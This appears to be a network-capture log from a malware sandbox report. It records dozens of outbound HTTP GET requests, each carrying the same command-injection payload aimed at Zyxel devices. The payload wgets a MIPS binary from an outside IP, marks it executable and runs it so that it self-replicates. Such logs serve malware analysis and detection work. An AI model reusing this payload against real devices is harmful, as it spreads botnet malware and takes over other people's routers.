                                                Jan 28, 2024 10:16:41.050910950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8492192.168.2.235990279.248.230.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050928116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8493192.168.2.2345460122.198.154.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050931931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8494192.168.2.2354918172.65.179.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050977945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8495192.168.2.23581365.143.126.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050982952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8496192.168.2.2354670109.172.21.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051000118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8497192.168.2.235036824.97.84.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051053047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8498192.168.2.235430639.139.87.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051079035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8499192.168.2.2355262100.158.154.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051105976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8500192.168.2.2345332139.72.97.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051111937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8501192.168.2.2346170130.174.68.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051148891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8502192.168.2.233621870.75.109.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051148891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8503192.168.2.233354670.188.45.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051194906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8504192.168.2.233809880.147.36.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051198006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8505192.168.2.2354748121.69.49.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051229000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8506192.168.2.234046264.2.54.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051239967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8507192.168.2.2353418141.132.45.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051276922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8508192.168.2.2360006138.68.181.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051307917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8509192.168.2.2358372130.116.240.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051347017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8510192.168.2.235053864.255.141.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051352024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8511192.168.2.23537208.237.107.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051373005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8512192.168.2.2350392200.37.27.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051388979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8513192.168.2.2344344123.124.222.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051424026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8514192.168.2.2355172132.174.26.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051440954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8515192.168.2.234941095.97.114.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051477909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8516192.168.2.2355168160.246.201.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051517010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8517192.168.2.2340764142.86.231.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051536083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8518192.168.2.234595858.158.136.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051557064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8519192.168.2.235808449.13.83.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051618099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8520192.168.2.2337514131.173.133.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051641941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8521192.168.2.2337410180.95.218.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051683903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8522192.168.2.2348564115.138.112.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051709890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8523192.168.2.2333654202.228.205.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051718950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8524192.168.2.234741840.156.187.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051743031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8525192.168.2.2352650151.97.2.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051784039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8526192.168.2.234801625.105.125.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051789999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8527192.168.2.233385865.106.241.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051840067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8528192.168.2.2359082196.109.217.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051863909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8529192.168.2.233643823.182.165.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051877022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8530192.168.2.234874079.74.127.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051919937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8531192.168.2.23433365.23.46.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051955938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8532192.168.2.235441888.180.220.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.051983118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8533192.168.2.2332896159.203.185.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052014112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8534192.168.2.235381083.35.239.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052038908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8535192.168.2.2348442218.49.41.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052058935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8536192.168.2.2335692158.195.2.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052073956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8537192.168.2.2340076193.245.27.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052112103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8538192.168.2.2348082156.247.3.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052134991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8539192.168.2.234634836.249.198.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052169085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8540192.168.2.233471623.65.70.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052191019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8541192.168.2.2339930203.100.89.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052226067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8542192.168.2.2336162131.169.40.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052226067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8543192.168.2.2357212191.206.97.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052262068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8544192.168.2.2360668207.144.129.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052297115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8545192.168.2.2352700128.208.155.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052336931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8546192.168.2.233352237.131.94.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052366018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8547192.168.2.2351086182.9.237.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052401066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8548192.168.2.234731257.143.17.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052401066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8549192.168.2.234934047.106.221.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052432060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8550192.168.2.234643865.114.67.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052450895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8551192.168.2.235279644.22.111.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052453995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8552192.168.2.2339700120.200.130.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.052488089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8553192.168.2.2349050212.78.235.42443
                                                TimestampBytes transferredDirectionData
